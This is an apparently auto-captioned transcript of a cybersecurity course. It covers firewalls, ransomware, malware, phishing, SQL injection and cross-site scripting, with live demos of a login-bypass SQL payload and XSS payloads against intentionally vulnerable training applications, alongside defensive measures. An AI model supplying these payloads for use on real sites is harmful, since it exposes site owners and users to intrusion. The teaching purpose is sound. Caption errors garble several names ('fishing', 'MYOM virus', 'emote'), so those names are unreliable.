whether or not that network packet is part of an established network connection such firewalls are also referred to as dynamic packet filtering firewalls our next type of firewall is called a proxy firewall this draws close comparison to how you give proxy attendance for a friend like how you take the authority to represent your friend the proxy firewall pretends to be you and interacts with the internet they come between you and the internet and thereby prevents direct connections this protects your devices identity and keeps the network safe from potential attacks only if the incoming data packet contents are protected the proxy firewall transfers it to you they’re also known as application level gateway the firewall can spot malicious actions and block your computer from receiving data packets from harmful sources in addition to preventing cyber attacks firewalls are also used in educational institutions and offices to restrict users access to certain websites or applications it is used to avoid access to unauthorized content it’s the year 2015 and Richard has just finished playing games on his computer after a long gaming session Richard tries to shut it down but find some random text file on the desktop that says ransom note the text file mentioned how a hacking group had encrypted Richard’s game files and private documents and he had to pay a ransom of $500 worth of Bitcoin in a specified Bitcoin address richard quickly checked his files only to see them being encrypted and unreadable this is the story of how the Tesla Crypt ransomware spread in 2015 which affected thousands of gamers before releasing the master key used for encrypting the files so what is ransomware for Richard to be targeted by such an attack he must have installed applications from untrusted sources or clicked an unverified link both of them can function as gateways for a ransomware breach ransomware is a type of malware that encrypts personal information and documents while demanding a ransom amount to decrypt them this ransom payment is mainly done using cryptocurrency to ensure anonymity but can also employ other routes once the files are encrypted or locked behind a password a text file is available to the victim explaining how to make the ransom payment and unlock the files for it just like Richard found the ransom note text file on his desktop even after the money has been paid there’s no guarantee that the hackers will send the decryption key or unlock the files but in certain sensitive situations victims make the payment hoping for the best having never been introduced to ransomware attacks before this gave Richard an opportunity to learn more about this and he began his research on the topic the spread of ransomware mostly starts with fishing attacks to know more about fishing attacks click the link in the button above users tend to click on unknown links received via emails and chat applications promising rewards of some nature once clicked the ransomware files installed on the system that encrypts all the files or blocks access to computer functions they can also be spread via malware transmitted via untrusted application installation or even a compromised wireless network another way to breach a system with ransomware is by using the remote desktop protocol or RDP access a computer can be accessed remotely using this protocol allowing a hacker to install malicious software on the system with the owner unaware of these developments coming to the different types of ransomware first we have locker ransomware which is a type of malware that blocks standard computer functions from being accessed until the payment to the hackers is complete it shows a lock screen that doesn’t allow the victim to use the computer for even basic purposes another type is crypto ransomware which encrypts the local files and documents in the computers once the files are encrypted finding the decryption key is impossible unless the ransomware variant is old and the keys are already available on the internet scareware is fake software that claims to have detected a virus or other issue on your computer and directs you to pay to resolve the problem some types of scareware lock the computer while others simply flood the screen with pop-up alerts without actually damaging files to prevent getting affected by ransomware Richard could have followed a few steps to further enhance his security one must always have backups of their data cloud storage for backup is easy but a physical backup in a hard drive is always recommended keeping the system updated with the latest security patches is always a good idea apart from system updates one must always have reputed antivirus software installed many antivirus software like Kasperski and Bit Defender have anti-ransomware features that periodically check for encryption of private documents when browsing the internet a user must always check for the lock symbol on the address bar which signifies the presence of HTTPS protocol for additional security if a system is infected with ransomware already there is a website no more ransom.org it has a collection of decryption tools for most well-known ransomware packages it can also help decrypt specific encrypted files if the list of anti-ransomware tools didn’t help the victim malware is a malicious software that is programmed to cause damage to a computer system network and hardware devices many malicious programs like Trojan viruses bombs and bots which cause damage to the system are known as malware most of the malware programs are designed to steal information from the targeted user or to steal money from the target by stealing sensitive data let’s take a look at the introduction for two different types of malware virus and Trojan firstly let’s take a look what exactly is a virus program a computer virus is a type of malicious program that on execution replicates itself they get attached to different files and programs which are termed as host programs by inserting their code if the attachment succeeds the targeted program is termed as infected with a computer virus now let’s take a look at the Trojan horse trojan horse program is a program that disguises itself as a legitimate program but harms the system on installation they hide within the attachments and emails then transfer from one system to another they create back doors into our system to allow the cyber criminal to steal our information let’s take a look how they function after getting installed into our system firstly we have virus programs the computer virus must contain two parts to infect the system first is a search routine which locates new files and data that is to be infected by the virus program and the second part is known as the copy routine which is necessary for the program to copy itself into the targeted file which is located by the search routine now let’s take a look at the Trojan horse functioning for Trojan horses entryway into our system is through emails that may look legitimate but may have unknown attachments and when such files are downloaded into the device the Troj program gets installed and infects the system they also infect the system on the execution of infected application or the executable file and attacks the system now that we understand what virus androgensions are let’s understand different types of virus androgens let’s take a look at different types of viruses the first one is known as the boot sector virus this type of virus damages the booting section of the system by infecting the masterboard record which is also known as MBR this damages the boot sector section by targeting the hard disk of the system then we have the macro virus macrovirus is a type of virus that gets embedded into the document related data and is executed when the file is open they also are designed to replicate themselves and infect the system on a larger scale and lastly we have the direct action virus this type of virus gets attached to executable files which on execution activates the virus program and infects the system once the infection of the file is completed they exit the system which is also the reason it is known as a non-resident virus let’s take a look at different types of Trojans the first type of Trojan is the backd dooror Trojan they are designed to create a backdoor in the system on execution of an infected program they provide remote access of a system to the hacker this way the cyber criminal can steal our system data and may use it for illegal activities next we have Cricost Trojan they enter the system by clicking the random pop-ups which we come across on the internet they attempt the user to give their personal details for different transactions or schemes which may provide remote access of a system to the cyber criminal and the last Trojan type is ransom tro this type of Trojan program after entering the system blocks the user from accessing its own system and also affects the system function the cyber criminal demands a ransom from the targeted user for the removal of the Trojan program from the device now that we understand some details regarding viruses and Trojan let’s solve a question the question is Jake was denied access to his system and he wasn’t able to control the data and information in his system now the actual question is what could be the reason behind his systems problem option A macro virus option B ransom Trojan option C back door Trojan give your answers in the comment section now let’s understand how to detect the activity of viruses and Trojan in our system to detect virus or Trojan activity in a system we can refer to the following points for viruses we have slowing down of the system and frequent application freeze shows that the infection of the virus is present in the system then we have the viruses can also steal sensitive data including passwords account details which may lead to unexpected log out from the accounts or corruption of the sensitive data and lastly we have frequent system crashes due to virus infection which damages the operating system for Trojan we have frequent system crashes and system also faces slow reaction time then we have there are more random pop-ups from the system which may indicate Trojan activity and lastly we have modification in the system application and change of the desktop appearance can be also due to the infection of a Trojan program next let’s take a look at a famous cyber attack for virus and a Trojan horse for virus we have the MYOM virus which was identified in the ER 2004 which affected over 50 million systems by creating a network of sending spam emails which was to gain back door access into our systems next for the Trojan horse we have the emote Trojan program which is specifically designed for financial theft and for stealing bank related information next we have few points for how to prevent virus entry or Trojan attack for a system the most basic way of virus protection is to using antivirus and do regular virus scan this will prevent virus entry in the system and also having more than one antivirus provides much better protection then avoid visiting uncertified websites can also prevent virus entry into our system then we have using regular driver updates and system updates to prevent virus entry for Trojan we have using certified softwares from legal sites to prevent any Trojan activity in our system and also avoid clicking random pop-ups that we often see on the internet and lastly using antivirus and firewalls for protection against Trojan horses is a good habit now that we have reached the end of the video let’s take a look what we learned for the first part we saw the main objective of the virus is to harm the data and information in a system whereas for the Trojan we have stealing of the data files and information effect of viruses is more drastic in comparison to the Trojan horses then we have viruses which are non- remote programs whereas Trojan horses are remote accessed and lastly viruses have the ability to replicate itself to harm multiple files whereas Trojan does not have the replication ability so let’s begin with what is SQL injection as the name suggest SQL injection vulnerability allows an attacker to inject malicious input into a SQL statement so SQL stands for structured query language which is a language used by an application to interact with a database now normally this attack is targeted towards a database to extract uh the data that is stored within however the vulnerability does not lie in the database itself the vulnerability will always lie in the application it is the developer’s prerogative of how to develop the application how to configure it to prevent SQL injection queries from happening a database is created to answer questions and if a question is asked it is supposed to answer it database needs to be configured for some amount of security but the vulnerability the flaw here for SQL injection will always lie in the application itself it is how the application interacts with the database that needs to be modified that needs to be maintained by the developer rather than just configuring the database itself so the attacker at this point in time when they send a query to the application will form a malformed query by injecting a particular command or an operator that is recognized by the SQL language and if that operator is passed through the application to the database then the database basically gets cracked or does a data dump because of that unwanted character coming in so this character needs to be filtered at the application level itself now let’s look at a quick demo so what we have done here is I have this virtual machine called OASP broken web applications virtual machine version 1.2 i’m going to power this on till this powers on I’m going to show you where we can download this uh utility from so you can just look for OASP broken web application project download you’ll find it on sourceforge.net click on the link you can download the broken web application project from here this is a 1.9 GB download and you can have a zip machine directly for VMware or Oracle virtual box now this is an application that has been developed by OASP which stands for open web application security project which is a not for-profit organization and uh periodically uh releases the most top 10 risks that an application uh will face for that particular year so they have given a web application uh with inbuilt vulnerabilities for professionals like us to practice upon to develop our skills upon because doing this in the real world is illegal i cannot go onto a website to demonstrate how a SQL injection attack works uh neither should you try your hands on it till you become very well rehearsed with it so till uh to upgrade your skills to upskill yourself please download this machine host it in a VMware workstation or Oracle virtual box and you can u then try your skills on it right so uh just going back to the browser here if I open up uh a new tab you’ll see that this machine has booted up and has an IP address called 71.132 so if I just go onto that IP address and I type in 1926 16871.132 and you’ll see the OASP broken web application project and there are a lot of training applications realistic intentionally vulnerable applications old versions of real applications and so on so forth so there is a lot of applications inbuilt over here that you can try your skills upon you are going to try to use the OAS utility over here uh this gives you the uh OAS top 10 risks for 2010 2013 2017 is the latest one so far uh but the difference between 2013 and 2017 is that some of these have changed but not all of them uh the order has changed a little bit but you can see that SQL injection is on the top A1 amongst the injection attacks right and you can see there are multiple types that have been given here the SQL injection for extracting data or SQL injection for bypass authentication or insert your injection uh uh attacks blind SQL injection and then there is a tool called SQL map which is available freely on your Linux machines Kali Linux or Parrot Linux whichever you want to use uh for your practice targets and so on so forth so if I just take you here for bypass authentication and this is a regular login page that an application may have right you look at a username you look at password you type that in and you log in so let’s say I don’t know a password here I’m just going to type in a username test password is ps I try to log in and it shows me that the account does not exist so the authentication mechanism does work I did try type in a username and password it wasn’t recognized with account does not exist now let’s try to type in a SQL query here i’m going to just give it a single quote which is an operator that is recognized by the SQL language which when uh the database tries to execute uh will cause the database to uh dump some data or to bypass authentication in this case and I’m going to give it a condition single quote or 1= 1 space hyphen space and I’m going to click on login now right now I’m not logged in at all and we tried our username and password and we weren’t able to login so now if I log in you will see that it gave me a status update saying the user has been authenticated and I’m logged in as admin got root so that is what these SQL queries can achieve i’m going to log out right now and uh we’re going to look at the basics of SQL injection so looking at that small demo looking now let’s look at what types of SQL injections are available so the first is inband SQL injection the there are two subtypes within inband error based injection attack and a union based injection attack the second type is blind SQL injection attack where there’s a boolean based and a time based attack and the third one is out ofbound SQL injection attack now what is inband SQL injection attack inband is where we either attempting the error based or the union based what is error based uh we send a query to the database we craft a query to the database and uh it generates an error me message and it dumps the error message right in front of us on the screen that uh makes us realize that there is a flaw and there there is some information that is dumped on the screen which we can then further utilize to craft our further queries as we go ahead whereas union based is the it is where we combine multiple statements at the same time so if you look at the URL earlier in the URL you would see a large structure in that URL uh we can try to add more two or more statements within the URL itself to combine them and then confuse the database into executing both the statements together and giving a data dump at the same time right so what would a error based uh SQL injection look like if I go back to the same database uh which is here right and if you remember the username we gave it a single quote or 1= 1 space – space we gave it the condition right so basically what it did was a single quote is an operator that goes to the database selects the default uh table in the user tables in this database column and then compares it to the condition that is given so the condition that we gave was 1 equals 1 which is always true so what it did was it selected the default uh user table that was available in the database and instead of comparing it to a password it compared it to the condition so if I give it 1 equals 2 where the condition is false and if I log in you will see that the account doesn’t exist comes back again because the condition was false and instead of comparing the user account to the password it basically uh compared the user account to the condition so if I give it a single quote or 1= 1 – space uh and login you can see that this is a correct condition and thus we are able to log in now before we even go uh to that extent if I just forget the condition over here and I just give it a single code the operator and I send this operator to the database and I click on login you will see that it generates an error which is right on top and it tells us the line the uh file where the error happened and you can see it happened in the MySQL handler.php PHP file right and then it gave us the message you have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use now why would a hacker want to do this in the first place because there are different types of databases so there is a MySQL MSQL or Microsoft SQL Oracle SQL IBM DB2 all of these are variations of the SQL database uh they use the SQL language however every database has its own command right they they have their own syntax they have their own uh specific commands that are utilized for the database so in this scenario the hacker wants to identify what database is being currently utilized so they can craft those particular queries so now with this injection with just me sending the quote and the error getting generated I now come to know that we are using a MySQL server and the version of that server is 5.1.73 and uh the rest of the information about uh where the handlers are located and so on so forth right this gives the information to the hacker of how they want to proceed next what kind of queries they want to create what kind of syntax they want to utilize so error based attack is where you generate these kind of errors uh and you get this information the union based is where you craft your queries within the URL or you can try to combine multiple statements within the input fields and try to generate a response from that then we come to boolean based SQL injection uh sends a SQL query to the database which forces the application to return a different result depending on whether the query returns a true or a false result so basically if the input is false the input both the inputs are false the output would be false uh there’s one input that is false the other input that is true input B the output would be true and so on so forth right so depending on the result from the inputs the attacker will come to know which input is true with this he can then access the database of the website so you’re trying to figure out by sending out multiple inputs uh and then analyzing the output to see what exactly uh which command exactly worked what was the resultant output of that command thus from this kind of an information the hacker can infer their next step forward then you have timebased SQL injections uh now there are times when a database administrator or an application administrator has done some security configuration and thus have disabled verbose error messages now what is a verbose error message the error message that we saw right here is a verbose error message that means that the message gives out details the message gives out details about what the database is the version and whatnot so if they have sanitized these errors and you no longer can generate these errors and thus you cannot figure out what database is then what do you do right for example if I just take you to simply learn and take you to a URL that is supposedly not accessible you can see that it gives a generic error oops like it looks like you have crash landed on Mars it doesn’t give you a verbose error that we saw here so this gives us a detail error of what went wrong where it gives us the database the version of the database and uh where the query went wrong and etc etc etc whereas on this side where there’s some there’s a lot of security that goes in here so you can see that it doesn’t generate a error you just get a generic page in front of you so in that case what does a hacker do so the hacker then injects a time based uh query in the URL which allows us to verify whether the command is being executed or not so uh we put in a time weight let’s say 10 seconds of time wait so if we the moment we inject the query if the query times for 10 seconds and then gets executed that means that the SQL injection is possible however if we inject the query and uh it just gets executed without the delay that means that the time uh injection attack would not be uh possible on that particular site out of bound is not a very common attack it depends on the features being enabled on the database management system that is being used by the web application so this can be a somewhat of a misconfiguration error uh by the database administrator where you have enabled functions and not sanitized them so you have not done in uh access controls properly you have not given account control so queries should never be executed at an administrative level they should always be uh executed at a user level with minimum privileges that are required for that query to be executed now if you’re allowing these kind of functions to be uh to be enabled at the DBMS and there is an administrative account that can have access to them at that point in time an out ofbound injection attack is possible so let’s look at how a website works right uh how SQL works on a website now the website is constructed of HTML hypertext markup language uh which would include JavaScripting for functionality cascading stylesheets for the mapping of the website right and then ReactJS and whatnot uh for further functionality now when we send a query to the website it is normally using the HTTP protocol or HTTPS protocol when the query reaches the application the application would then go ahead and generate the SQL query uh at the client side you’ll have uh all these scripting languages coming in uh on the front end uh that we can utilize to craft queries and then send them across at the server side you’ll have uh databases like Oracle MySQL MSQL and so on so forth that will then execute those queries right so just to give you an example if I use a tool called Postman what we generally do uh when we craft a query is we send out a uh get request to the website and then we receive a response from the site uh with the HTML code and everything so this is a tool that is utilized by software testers to test the responses that you’re going to get from various websites so on the left hand side you can see I’ve used it on quite a bit uh here we have a example for gmail.com so let’s continue with that so this is a get request being sent to gmail the moment I send it it’s going to create an HTTP request and send it across the response that I get is this this is the HTML code for gmail.com right these are the cookies uh these are the headers uh that include information so you can see this is a text HTML character set utilized is UTF8 and the configuration uh that has been done with the application right so this is where uh everything comes in this is the cookie that has been sent with that particular uh request that I had sent out now if you analyze this query right so when we went onto this application and I typed in that single quote and we generated this error right uh you can see that the application converted this into a SQL query so the query was select username from accounts where the username in quotes single quotes and we use the quote right the single quote right there so uh that’s where we use that operator and that’s where the exception error occurred so these are the kind of queries that are structured by the application and then taken on to the database for execution when we type in uh it is a HTTP get request with the username and password within that query uh that is sent to the application the application converts it into a SQL query sends it to the database and the database responds with the appropriate response so how do we prevent SQL injection in the first place use prepared statements and parameterized queries uh these statements make sure that the parameters passed into SQL statements are treated in a safe manner so for example we saw that the single quote was an operator this shouldn’t be allowed to be utilized in the first place right so here what we are doing here is a secure way of running a SQL query in the JDBC using a parameterized statement define which user we want to find so there’s a string the email comes in connection to the database we are going to figure out how the connection is going to be passed how it is going to be created construct the SQL statement we want to run specifying the parameter right so we define how is it going to be uh created what is going to be created what can be passed to the database and what should not be passed to the database so that is one way of uh utilizing prepared statements and parameterized queries then we have object relational mapping most development uh teams prefer to use objection object relational mapping frameworks to make the translation of SQL results set into code objects more seamless so this is an example of object relational mapping uh where we map certain objects and allow that to be executed and then escaping inputs in a simple way to protect against most SQL injection attacks many languages have standard functions to achieve this right so you need to be very careful while using escape characters in your codebase when a SQL statement is constructed not all injection attacks rely on abuse of code characters so you need to know what characters are being utilized uh in the configuration that you have created in the structure that you have created in the code that you have created uh which characters are being recognized as operators you need to sanitize those operators and you need to uh basically ensure that these operators cannot be accepted as user input if they are they’re weeded out by the application and they never reach the database other methods of preventing SQL injection are uh password hashing so that passwords cannot be bypassed the passwords cannot be recovered passwords cannot be cracked uh third party authentication you use oath or uh some other service for a single sign on mechanism does uh you rely on a third party to maintain the security of authentication and uh what kind of parameters are passed for example uh using LinkedIn login or Facebook login right uh for the layman you normally go on to Facebook and you allow if you’re using a game right if you start playing a game you’re allowed to log into the game using your Facebook credentials or your Google credentials now that is not just for ease of use but the game user the developer has outsourced the authentication mechanisms to third parties such as Facebook or Google because they understand that that authentication mechanism is as safe as can be facebook and Google are wealthy organizations uh hire a lot of security experts and the development for their authentication mechanisms is topnotch small organization cannot spend that kind of money on security itself right so you use a third party authentication mechanism to ensure that these kind of attacks may not happen then web application firewalls uh having a web application firewall and configuring it properly uh for SQL injection attacks is one of the sureot method of uh mitigating or minimizing the uh threat in the first place so at this point in time you have realized that the application has some vulnerabilities for SQL injection and instead of recoding or restructuring the application uh you want to take the easier way out or the cheaper way out so what you do is you uh you install a web application firewall and you configure the web application firewall to identify malicious queries and stop them uh at the firewall level itself so they never reach the application and thus the vulnerabilities on the application don’t get executed buy better software and keep on updating the software so it’s not necessary that once you have a software you install it it’s going to be safe for life new vulnerabilities are discovered every day every hour and it may so happen what is secure today may be completely insecure tomorrow or the day after right so you need to keep on upgrading the software if there are no upgrades available and the vulnerability still exist you might want to migrate to a better software and thus uh ensure that you don’t get hacked right always update and use patches organizations keep on sending out updates and patches as and when they are released you need to install them to uh enhance your security postures and then continuously monitor SQL statements and databases use protocol monitors uh use different softwares use the firewalls to keep on monitoring what kind of queries you’re uh getting and based on those queries you want to ensure the inputs and the queries that are creating are not detrimental to the health of the software that you have jane is relaxing at home when she receives an email from a bank that asks her to update her credit card PIN in the next 24 hours as a security measure judging the severity of the message Jane follows the link provided in the email on delivering her current credit card PIN and the supposedly updated one the website became unresponsive which prompted her to try sometime later however after a couple of hours she noticed a significant purchase from a random website on that same credit card which she never authorized frantically contacting the bank Jane realized the original email was a counterfeit or a fake message with a malicious link that entailed credit card fraud this is a classic example of a fishing attack fishing attacks are a type of social engineering where a fraudulent message is sent to a target on the premise of arriving from a trusted source its basic purpose is to trick the victim into revealing sensitive information like passwords and payment information it’s based on the word fishing which works on the concept of baits if a supposed victim catches the bait the attack can go ahead which in our case makes Jane the fish and the fishing emails the bait if Jane never opened the malicious link or was cautious about the email authenticity an attack of this nature would have been relatively ineffective but how does the hacker gain access to these credentials a fishing attack starts with a fraudulent message which can be transmitted via email or chat applications even using SMS conversations to impersonate legitimate sources is known as smishing which is a specific category of fishing attacks irrespective of the manner of transmission the message targets the victim in a way that coaxes them to open a malicious link and provide critical information on the requisite website more often than not the websites are designed to look as authentic as possible once the victims submit information using the link be it a password or credit card details the data is sent to the hacker who designed the email and the fake website giving him complete control over the account whose password was just provided often carried out in campaigns where an identical fishing mail is sent to thousands of users the rate of success is relatively low but never zero between 2013 and 2015 corporate giants like Facebook and Google were tricked off of $100 million due to an extensive fishing campaign where a known common associate was impersonated by the hackers apart from credit access some of these campaigns target the victim device and install malware when clicked on the malicious links which can later function as a botnet or a target for ransomware attacks there is no single formula for there are multiple categories of fishing attacks the issue with Jane where the hacker stole her bank credentials falls under the umbrella of deceptive fishing a general email is sent out to thousands of users in this category hoping some of them fall prey to this scam spear fishing on the other hand is a bit customized version the targets are researched before being sent an email for example if you never had a Netflix subscription sending you an email that seems like the Netflix team sends it becomes pointless this is a potential drawback of deceptive fishing techniques on the other hand a simple screenshot of a Spotify playlist being shared on social media indicates a probable point of entry the hacker can send counterfeit messages to the target user while implying the source of such messages being Spotify tricking them into sharing private information since the hacker already knows the target uses Spotify the chances of victims taking the bait increase substantially for more important targets like CEOs and people with a fortune on their back the research done is tenfold which can be called a case of whaling the hackers prepare and wait for the right moment to launch their fishing attack often to steal industry secrets for rival companies or sell them off at a higher price apart from just emails farming focuses on fake websites that resemble their original counterparts as much as possible a prevalent method is to use domain names like Facebook with a single O or YouTube with no E these are mistakes that people make when typing the full URL in the browser leading them straight to a counterfeit web page which can fool them into submitting private data a few more complex methods exist to drive people onto fake websites like ARP spoofing and DNS cash poisoning but they are rarely carried out due to time and resource constraints now that we know how fishing attacks work let’s look at ways to prevent ourselves from becoming victims while the implications of a fishing attack can be extreme protecting yourself against these is relatively straightforward jane could have saved herself from credit card fraud had she checked the link in the email for authenticity and that a redirected to a secure website that runs on the HTTPS protocol even suspicious messages shouldn’t be entertained one must also refrain from entering private information on random websites or pop-up windows irrespective of how legitimate they seem it is also recommended to use secure anti-ishing browser extensions like cloudfish to sniff out malicious emails from legitimate ones the best way to prevent fishing is browsing the internet with care and being on alert for malicious attempts at all times start by learning about cross-ite scripting from a layman’s perspective cross-ite scripting also known as XSS is a type of code injection attack that occurs on the client side the attacker intends to run harmful scripts in the victim’s web browser by embedding malicious code in a genuine web page or online application the real attack takes place when the victim hits the malicious code infected web page or online

    application the web page or application serves as a vehicle for the malicious script to be sent to the user’s browser forums message boards and online pages that enable comments are vulnerable vehicles that are frequently utilized for cross-cripting assaults a web page or web application is vulnerable to XSS if the output it creates contains unsanitized user input the victim’s browser must then parse this user input in VBScript ActiveX Flash and even CSS cross-side scripting attacks are conceivable they are nevertheless most ubiquitous in JavaScript owing to the fact that JavaScript is most important to most browser experiences nowadays the main purpose of this attack is to steal the other user’s identity be it via cookies session tokens and other information in most of the cases this attack is being used to steal the other person’s cookies as we know cookies help us to login automatically therefore with the stolen cookies we can login with other identities and this is one of the reasons why this attack is considered as one of the riskiest attacks it can be performed with different client side programming languages as well cross-side scripting is often compared with similar client side attacks as client side languages are mostly being used during this however an XSS attack is considered riskier because of its ability to damage even less vulnerable technologies most often this attack is performed with JavaScript and HTML javascript is a programming language that runs on web pages inside your browser the client side code adds functionality and interactivity to the web page and is used extensively on all major applications and CMS platforms unlike serverside languages such as PHP JavaScript code runs inside your browser and cannot impact the website for other visitors it is sandboxed to your own navigator and can only perform actions within your own browser window while JavaScript is client side and does not run on the server it can be used to interact with the server by performing background requests attackers can then use these background requests to add unwanted spam content to a web page without refreshing it they can then gather analytics about the client’s browser or perform actions asynchronously the manner of attack can range in a variety of ways it can be a single link which the user must click on to initiate a JavaScript piece of code it can be used to show any piece of images that can be later used as a front end for malicious code being installed as malware with the majority of internet users unaware of how metadata works or the ways in which web requests are called the chances of victims clicking on a redirecting links is far too high cross-ite scripting can occur on the malicious script executed at the client site using a fake page or even a form that is displayed to the user on websites with displayed advertisements malicious emails can also be sent to the victim these attacks occur when the malicious user finds the vulnerable parts of the website and sends it as appropriate malicious input now that we understand the basics of cross-ite scripting let us learn more about how this kind of attack works in the first place we have the website or the web browser which is used to show content to the victim or which is the user in our case whenever the user wants to grab some content from the website the website asks the data from the server the server provides this information to the website and the web browser which ultimately reaches the victim how the hacker comes into play here it passes on certain arguments to the web browser which is can be then forwarded back to the server or to the user at hand the entire cross-ite scripting attack vector means sending and injecting malicious code or script this attack can be performed in different ways depending on the type of attack the malicious script may be reflected on the victim’s browser or stored in the database and executed every time when the user calls the appropriate function the main reason for this attack is inappropriate users input validation where the malicious input can get into the output a malicious user can enter a script which will be injected onto the website’s code then the browser is not able to know if the executed code is malicious or not therefore this malicious script is being executed on the victim’s browser or any faked form if that is being displayed for the users there are many ways to trigger an XSS attack for example the execution could be triggered automatically when the page loads or when a user hovers over specific elements of the page like hyperlinks potential consequences of cross-sight scripting attacks include capturing keystrokes of a user redirecting a user to malicious websites running web browser based exploits obtaining cookie information of a user who is logged into a website and many more in some cases cross-ite scripting attack leads to complete compromise of the victim’s account attackers can trick users into entering credentials on a fake form which can then provide all information to the attacker with the basic working of a cross-ite scripting attack out of the way let us go over the different ways hackers can leverage vulnerable web applications to gather information and eventually breach those systems the prime purpose of performing XSS attack is to steal the other person’s identity as mentioned it may be cookies session tokens etc xss may also be used to display faked pages or forms for the victim however this can be performed in several ways we have a reflected attack this attack occurs when a malicious script is not being saved on the web server but is reflected in the website results reflected XSS code is not being saved permanently in this case the malicious code is being reflected in any website result the attack code can be included in the faked URL or in the HTTP parameters it can affect the victim in different ways by displaying faked malicious page or by sending a malicious email in a reflected cross-ite scripting example the input of a search form is reflected on the page to show what the search key was an attacker may craft a URL that contains malicious code and then spread the same URL via email or social media a user who clicks on this link opens the valid web application which then runs the malicious code in the browser this script is not stored in the web application and malicious code is shown only to one user the user that opens the link executes the script and the attack is not necessarily visible on the server side or to the app owner itself the next variant is a stored cross-ite scripting attacks this occurs when a malicious script is being saved on the web server permanently this can be considered a riskier attack since it has leverage for more damage in this type of attack the malicious code or script is being saved on the server for example in the database or the website it is executed every time the users call the appropriate functionality this way stored XSS attack can affect many users also as the script is being stored on the web server it will affect the website for a longer time in order to perform stored XSS attack the malicious scripts should be sent through the vulnerable input form for example can be a command field or review field this way the appropriate script will be saved in the database and evaluated on the page load or appropriate function calling in a stored XSS example the script might have been submitted via an input field to the web server which did not perform a sufficient validation and stores the script permanently in the database the consequence of this might be that the script is now being delivered to all users visiting the web application and if for example able to gain access to the user session cookies in this attack the script is permanently stored in the web app the users visiting the app after the information retrieve the script the malicious code then exploits the flaws in the web application and the script and the attack is visible on the server side or to the app owner as well the third variant is DOM based cross-ite scripting attacks this type of attack occurs when the DOM environment is being changed but the client side code does not change when the DOM environment is being modified in the victim’s browser the client side code executes differently in order to get a better understanding of how XSS DOM attack is being performed let us analyze the following example if there is a website called textin.com we know default is a parameter therefore in order to perform XSS DOM attack we should send a script as parameters a DOM based XSS attack may be successfully executed even when the server does not embed any malicious code into the web page by using a flaw in the JavaScript executed in the browser for example if the client side JavaScript modifies the DOM tree of the web page it can be based on an input field or the get parameter without validating the input this allows the malicious code to be executed the malicious code that exploits flaws in the browser on the user side and the script and the attack is not necessarily visible on the server side or to the app owner by now it is clear that cross-ite scripting attacks are difficult to detect and even tougher to fight against there are however plenty of ways one can safeguard against such attacks let’s go through some of these preventive measures like mentioned earlier XSS attacks are sometimes difficult to detect however this can be changed if you get some external help a way to prevent excss attacks is using automated testing tools like crash test security suit or aunetic security suit still manual testing is highly timeconuming and costly and therefore not possible to be done for every iteration of your web application consequently your code shouldn’t be untested before any release using automated security you can scan your web application for cross-ite scripting and other critical vulnerabilities before every release this way you can ensure that your web application slide version is still secured whenever you alter or add a feature input fields are the most common point of entry for XSS attack script therefore you should always screen and validate any information input into data fields this is particularly important if the data will be included as HTML output this can be used to protect against reflected excss attacks validation should occur on both the client side and server side as an added precaution this helps validating the data before it’s being sent to the servers and can also protect against persistent XSS scripts this can be accomplished using JavaScript xss attacks only appear if any user input is being displayed on the web page therefore try to avoid displaying any untrusted user input if possible if you need to display user data restrict the places where the user input might appear any input displayed inside a JavaScript tag or a URL shown on the site is much more likely to be exploited than the input that appears inside a division or a span element inside the HTML body protecting against excss vulnerabilities typically requires properly escaping userprovided data that is placed on the page rather than trying to determine if the data is user provided and could be compromised we should always play it safe and escape data whether it is user provided or not unfortunately because there are many different rules for escaping you still must choose the proper type of escaping before settling on a final code encoding should be applied directly before user controllable data is written to a page because the context you’re writing into determines what kind of encoding you need to use for example values inside a JavaScript string require a different type of escaping to those in an HTML context sometimes you’ll need to apply multiple layers of encoding in the correct order for example to safely embed user input inside an event handler you need to deal with both JavaScript context and the HTML context so you need to first uni code escape the input and then HTML encoded content security policy or CSP is a computer security standard introduced to prevent cross-ite scripting clickjing and other code injection attacks resulting from the execution of malicious content in the trusted webpage context it is a candidate recommendations of the W3C working group on web application security it’s widely supported by modern web browsers and provides a standard method for website owners to declare approved origins of content that browsers should be allowed to load on their website http is an additional flag included in a set cookie HTTP response header using the HTTP only flag when generating a cookie helps mitigate the risk of clientside script accessing the protected cookie that is if the browser supports it if the HTTP only flag is included in the HTTP response header the cookie cannot be accessed through a client side script again this is if the browser supports this flag as a result even if a cross-side scripting flaw exists and a user accidentally accesses a link that exploits this flaw the browser will not reveal the cookie to a third party if a browser does not support HTTP only and a website attempts to set an HTTP cookie the HTTP only flag will be ignored browser browser thus creating a traditional script accessible cookie as a result the cookie becomes vulnerable to theft of modification by any malicious script next on our docket is a live demonstration where we solve a set of cross-ite scripting problems starting from the basic level to the topmost level six we’re going to start at level one in this web application it demonstrates a common cause of cross-side scripting where user input is directly included in the page without proper escaping if we interact with a vulnerable application window here and find a way to make it execute JavaScript of our choosing we can take actions inside the vulnerable window or directly edit its URL bar this task needs only basic knowledge let’s see why the most primitive injections work here right away let’s do a simple query and inspect the resulting HTML page i’m going to use this phrase with a single quote as a special character we can now inspect the HTML page we can see here in this line the special character single quote appears in the result over here the provided query text is placed directly in a B tag as in a body element we need to perform a reflected XSS into the web application because they are non-persistent XSS attacks and the payload should be included in the URL to perform successful exploitation we can use any payload but we’re going to use the simple one to perform an alert in this web application it’s simple and can be shown easily just going to write the script over here and we’re going to press search as you can see we have successfully launched our first cross-sight scripting attack we can see an alert box pop up with the necessary message and a similar process can be used to steal browser cookies and passwords albeit with different commands now we have the option to move to level two in this web application it shows that how easily XSS bugs can be introduced in complex chat applications chat app conversations are stored in a database and retrieved when a user wants to see the conversation therefore if a malicious user injects some JavaScript code all visitors will be infected this kind of cross-ite scripting attack is more powerful and it is more riskier than reflected cross-ite scripting attacks and that’s why is known as stored XSS i posted my query with a special character of a single quote and this is what I get whatever I typed in simply appeared on the page right after I click on share status let’s see the source you can see here the text I posted seems directly put inside a block code tag so even a simple script tag we used in level one should work here but it will not let us examine the code to understand why we’re going to toggle the code of A here and check the index.html file important part is line 32 the generated HTML fragment which is the HTML variable in the code is added to the mail HTML using the inner HTML method so when the browser parsing this HTML fragment it will not execute any script tag defined within that HTML fragment html parser will not execute a script tag when it parses HTMLs via this method this is why the script tag like we used in level one is not going to work here our solution is to use events events will execute the defined JavaScript we’re going to use an image over here and when we press on share status in the above injection we are loading an image that doesn’t exist which causes to trigger an on error event in on error event the it will execute our alert method with that we are able to beat level two and we can now move up to the next level in our challenge as you can see clicking on any tab causes the tab number to be displayed 